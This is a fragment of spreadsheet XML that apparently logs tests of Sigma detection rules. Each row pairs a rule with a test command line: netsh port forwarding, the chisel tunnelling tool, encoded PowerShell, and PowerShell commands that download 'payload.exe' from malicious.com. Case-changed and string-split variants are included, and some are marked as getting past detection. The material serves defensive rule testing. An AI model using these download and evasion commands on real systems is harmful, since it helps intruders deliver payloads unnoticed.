        <v>0</v>
      </c>
    </row>
    <row r="255" ht="15.75" customHeight="1" s="42">
      <c r="A255" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B255" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C255" s="44" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D255" s="44" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E255" s="43" t="inlineStr">
        <is>
          <t>netsh.exe interface portproxy add v4tov4 listenport=1337 connectport=1337  connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F255" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G255" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H255" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I255" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J255" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K255" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="256" ht="15.75" customHeight="1" s="42">
      <c r="A256" s="43" t="n"/>
      <c r="B256" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_chisel</t>
        </is>
      </c>
      <c r="C256" s="44" t="inlineStr">
        <is>
          <t>PUA - Chisel Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D256" s="44" t="inlineStr">
        <is>
          <t>8b0e12da-d3c3-49db-bb4f-256703f380e5</t>
        </is>
      </c>
      <c r="E256" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe chisel.dll,server 8080</t>
        </is>
      </c>
      <c r="F256" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G256" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H256" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I256" s="44" t="n"/>
      <c r="J256" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K256" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="257" ht="15.75" customHeight="1" s="42">
      <c r="A257" s="43" t="n"/>
      <c r="B257" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_chisel</t>
        </is>
      </c>
      <c r="C257" s="44" t="inlineStr">
        <is>
          <t>PUA - Chisel Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D257" s="44" t="inlineStr">
        <is>
          <t>8b0e12da-d3c3-49db-bb4f-256703f380e5</t>
        </is>
      </c>
      <c r="E257" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABjAGwA... (encoded command with chisel)</t>
        </is>
      </c>
      <c r="F257" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G257" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H257" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I257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57" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K257" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="258" ht="15.75" customHeight="1" s="42">
      <c r="A258" s="43" t="n"/>
      <c r="B258" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_chisel</t>
        </is>
      </c>
      <c r="C258" s="44" t="inlineStr">
        <is>
          <t>PUA - Chisel Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D258" s="44" t="inlineStr">
        <is>
          <t>8b0e12da-d3c3-49db-bb4f-256703f380e5</t>
        </is>
      </c>
      <c r="E258" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enC JABjAGwA... (encoded command with chisel)</t>
        </is>
      </c>
      <c r="F258" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G258" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H258" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I258" s="44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58" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K258" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="259" ht="15.75" customHeight="1" s="42">
      <c r="A259" s="43" t="n"/>
      <c r="B259" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_chisel</t>
        </is>
      </c>
      <c r="C259" s="44" t="inlineStr">
        <is>
          <t>PUA - Chisel Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D259" s="44" t="inlineStr">
        <is>
          <t>8b0e12da-d3c3-49db-bb4f-256703f380e5</t>
        </is>
      </c>
      <c r="E259" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eNc JABjAGwA... (encoded command with chisel)</t>
        </is>
      </c>
      <c r="F259" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G259" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H259" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I259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59" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K259" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="260" ht="15.75" customHeight="1" s="42">
      <c r="A260" s="43" t="n"/>
      <c r="B260" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_chisel</t>
        </is>
      </c>
      <c r="C260" s="43" t="inlineStr">
        <is>
          <t>PUA - Chisel Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D260" s="43" t="inlineStr">
        <is>
          <t>8b0e12da-d3c3-49db-bb4f-256703f380e5</t>
        </is>
      </c>
      <c r="E260" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABjAGwA... (encoded command with chisel)</t>
        </is>
      </c>
      <c r="F260" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G260" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H260" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I260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60" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K260" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="261" ht="15.75" customHeight="1" s="42">
      <c r="A261" s="44" t="n"/>
      <c r="B261" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_chisel</t>
        </is>
      </c>
      <c r="C261" s="44" t="inlineStr">
        <is>
          <t>PUA - Chisel Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D261" s="44" t="inlineStr">
        <is>
          <t>8b0e12da-d3c3-49db-bb4f-256703f380e5</t>
        </is>
      </c>
      <c r="E261" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EnC JABjAGwA... (encoded command with chisel)</t>
        </is>
      </c>
      <c r="F261" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G261" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H261" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I261" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious PowerShell Encoded Command Patterns (b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J261" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K261" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="262" ht="15.75" customHeight="1" s="42">
      <c r="A262" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B262" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C262" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D262" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E262" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F262" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G262" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H262" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I262" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J262" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K262" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="263" ht="15.75" customHeight="1" s="42">
      <c r="A263" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B263" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C263" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D263" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E263" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnD "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F263" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G263" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H263" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I263" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J263" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K263" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="264" ht="15.75" customHeight="1" s="42">
      <c r="A264" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B264" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C264" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D264" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E264" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMManD "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F264" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G264" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H264" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I264" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J264" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K264" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="265" ht="15.75" customHeight="1" s="42">
      <c r="A265" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B265" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C265" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D265" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E265" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F265" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G265" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H265" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I265" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J265" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K265" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="266" ht="15.75" customHeight="1" s="42">
      <c r="A266" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B266" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C266" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D266" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E266" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F266" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G266" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H266" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I266" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J266" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K266" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="267" ht="15.75" customHeight="1" s="42">
      <c r="A267" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B267" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C267" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D267" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E267" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F267" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G267" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H267" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I267" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J267" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K267" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="268" ht="15.75" customHeight="1" s="42">
      <c r="A268" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B268" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C268" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D268" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E268" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F268" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G268" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H268" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I268" s="43" t="n"/>
      <c r="J268" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K268" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="269" ht="15.75" customHeight="1" s="42">
      <c r="A269" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B269" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C269" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D269" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E269" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F269" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G269" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H269" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I269" s="43" t="n"/>
      <c r="J269" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K269" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="270" ht="15.75" customHeight="1" s="42">
      <c r="A270" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B270" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C270" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D270" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E270" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F270" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G270" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H270" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I270" s="43" t="n"/>
      <c r="J270" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K270" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="271" ht="15.75" customHeight="1" s="42">
      <c r="A271" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B271" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C271" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D271" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E271" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F271" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G271" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H271" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I271" s="43" t="n"/>
      <c r="J271" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K271" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="272" ht="15.75" customHeight="1" s="42">
      <c r="A272" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B272" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C272" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D272" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E272" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F272" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G272" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H272" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I272" s="43" t="n"/>
      <c r="J272" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K272" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="273" ht="15.75" customHeight="1" s="42">
      <c r="A273" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B273" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C273" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D273" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E273" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F273" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G273" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H273" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I273" s="43" t="n"/>
      <c r="J273" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K273" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="274" ht="15.75" customHeight="1" s="42">
      <c r="A274" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B274" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C274" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D274" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E274" s="44" t="inlineStr">
        <is>
          <t>powershell -c "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F274" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G274" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H274" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I274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74" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K274" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="275" ht="15.75" customHeight="1" s="42">
      <c r="A275" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B275" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C275" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D275" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E275" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F275" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G275" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H275" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I27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75" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K275" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="276" ht="15.75" customHeight="1" s="42">
      <c r="A276" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B276" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C276" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D276" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E276" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F276" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G276" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H276" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I276" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J276" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K276" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="277" ht="15.75" customHeight="1" s="42">
      <c r="A277" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B277" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C277" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D277" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E277" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F277" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G277" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H277" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I277" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J277" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K277" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="278" ht="15.75" customHeight="1" s="42">
      <c r="A278" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B278" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C278" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D278" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E278" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F278" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G278" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H278" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I278" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J278" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K278" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="279" ht="15.75" customHeight="1" s="42">
      <c r="A279" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B279" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C279" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D279" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E279" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F279" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G279" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H279" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I279" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J279" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K279" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="280" ht="15.75" customHeight="1" s="42">
      <c r="A280" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
